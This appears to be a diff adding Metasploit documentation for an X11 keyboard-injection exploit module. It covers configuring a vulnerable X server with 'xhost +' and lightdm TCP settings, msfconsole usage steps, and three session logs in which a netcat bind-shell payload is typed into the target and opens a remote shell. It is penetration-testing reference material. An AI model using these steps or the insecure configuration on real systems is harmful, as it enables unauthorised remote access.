|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +X11 (X Window System) is a graphical windowing system most common on unix/linux. |
| 4 | +The service can accept connections from any users when misconfigured which is done with the command `xhost +`. |
| 5 | + |
| 6 | +This exploit has been verified against: |
| 7 | + |
| 8 | +1. Ubuntu 14.04 |
| 9 | +2. Ubuntu 16.04 |
| 10 | +3. Kali via Emulation method |
| 11 | + |
| 12 | +This exploit does NOT work against: |
| 13 | + |
| 14 | +1. Solaris 10 Java Desktop System (alt+F2 has no effect) |
| 15 | + |
| 16 | +### Emulation |
| 17 | + |
| 18 | +This can be emulated (on kali) utilizing the following command: `socat -d -d TCP-LISTEN:6000,fork UNIX-CONNECT:/tmp/.X11-unix/X0` |
| 19 | + |
| 20 | +### Ubuntu 12.04, 14.04 |
| 21 | + |
| 22 | +1. `sudo nano /etc/lightdm/lightdm.conf` |
| 23 | +2. Under the `[SeatDefaults]` area, add: |
| 24 | + |
| 25 | + ``` |
| 26 | + xserver-allow-tcp=true |
| 27 | + allow-guest=true |
| 28 | + ``` |
| 29 | +
|
| 30 | +3. logout or reboot |
| 31 | +4. Verification: ```sudo netstat -antp | grep 6000``` |
| 32 | +
|
| 33 | + ``` |
| 34 | + tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X |
| 35 | + ``` |
| 36 | +
|
| 37 | +5. Now, to verify you allow ANYONE to get on X11, type: `xhost +` |
| 38 | +
|
| 39 | +### Ubuntu 16.04 |
| 40 | +
|
| 41 | + Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*` |
| 42 | +
|
| 43 | +
|
| 44 | +## Verification Steps |
| 45 | +
|
| 46 | + 1. Install and configure X11 |
| 47 | + 2. Start msfconsole |
| 48 | + 3. Do: `use exploit/unix/x11/x11_keyboard_exec` |
| 49 | + 4. Do: `set rhost [IPs]` |
| 50 | + 5. Do: `set payload [payload]` |
| 51 | + 6. Do: `exploit` |
| 52 | +
|
| 53 | +## Scenarios |
| 54 | +
|
| 55 | +### Ubuntu 14.04 |
| 56 | +
|
| 57 | +``` |
| 58 | +msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat |
| 59 | +payload => cmd/unix/bind_netcat |
| 60 | +msf exploit(x11_keyboard_exec) > run |
| 61 | + |
| 62 | +[*] Started bind handler |
| 63 | +[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Register keyboard |
| 64 | +[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening "Run Application" |
| 65 | +[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds... |
| 66 | +[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Opening xterm |
| 67 | +[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Waiting 5 seconds... |
| 68 | +[*] 192.168.2.75:6000 - 192.168.2.75:6000 - Typing and executing payload |
| 69 | +[*] Command shell session 1 opened (192.168.2.117:44549 -> 192.168.2.75:4444) at 2017-04-23 15:26:56 -0400 |
| 70 | + |
| 71 | +id |
| 72 | +uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare) |
| 73 | +cat /etc/*release |
| 74 | +DISTRIB_ID=Ubuntu |
| 75 | +DISTRIB_RELEASE=14.04 |
| 76 | +DISTRIB_CODENAME=trusty |
| 77 | +DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS" |
| 78 | +NAME="Ubuntu" |
| 79 | +VERSION="14.04.5 LTS, Trusty Tahr" |
| 80 | +ID=ubuntu |
| 81 | +ID_LIKE=debian |
| 82 | +PRETTY_NAME="Ubuntu 14.04.5 LTS" |
| 83 | +VERSION_ID="14.04" |
| 84 | +``` |
| 85 | +
|
| 86 | +### Ubuntu 16.04 |
| 87 | +
|
| 88 | +``` |
| 89 | +msf exploit(x11_keyboard_exec) > set rhost 192.168.2.26 |
| 90 | +rhost => 192.168.2.26 |
| 91 | +msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat |
| 92 | +payload => cmd/unix/bind_netcat |
| 93 | +msf exploit(x11_keyboard_exec) > exploit |
| 94 | + |
| 95 | +[*] Started bind handler |
| 96 | +[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Register keyboard |
| 97 | +[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening "Run Application" |
| 98 | +[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds... |
| 99 | +[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Opening xterm |
| 100 | +[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Waiting 5 seconds... |
| 101 | +[*] 192.168.2.26:6000 - 192.168.2.26:6000 - Typing and executing payload |
| 102 | +[*] Command shell session 2 opened (192.168.2.117:45813 -> 192.168.2.26:4444) at 2017-04-23 15:29:27 -0400 |
| 103 | + |
| 104 | +id |
| 105 | +uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) |
| 106 | +cat /etc/*release |
| 107 | +DISTRIB_ID=Ubuntu |
| 108 | +DISTRIB_RELEASE=16.04 |
| 109 | +DISTRIB_CODENAME=xenial |
| 110 | +DISTRIB_DESCRIPTION="Ubuntu 16.04.1 LTS" |
| 111 | +NAME="Ubuntu" |
| 112 | +VERSION="16.04.1 LTS (Xenial Xerus)" |
| 113 | +ID=ubuntu |
| 114 | +ID_LIKE=debian |
| 115 | +PRETTY_NAME="Ubuntu 16.04.1 LTS" |
| 116 | +VERSION_ID="16.04" |
| 117 | +UBUNTU_CODENAME=xenial |
| 118 | +``` |
| 119 | +
|
| 120 | +### Kali via Emulation |
| 121 | +
|
| 122 | +``` |
| 123 | +msf exploit(x11_keyboard_exec) > set payload cmd/unix/bind_netcat |
| 124 | +payload => cmd/unix/bind_netcat |
| 125 | +msf exploit(x11_keyboard_exec) > set rhost 127.0.0.1 |
| 126 | +rhost => 127.0.0.1 |
| 127 | +msf exploit(x11_keyboard_exec) > run |
| 128 | + |
| 129 | +[*] Started bind handler |
| 130 | +[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Register keyboard |
| 131 | +[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening "Run Application" |
| 132 | +[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds... |
| 133 | +[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Opening xterm |
| 134 | +[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Waiting 5 seconds... |
| 135 | +[*] 127.0.0.1:6000 - 127.0.0.1:6000 - Typing and executing payload |
| 136 | +[*] Command shell session 3 opened (127.0.0.1:37909 -> 127.0.0.1:4444) at 2017-04-23 15:35:26 -0400 |
| 137 | +``` |
0 commit comments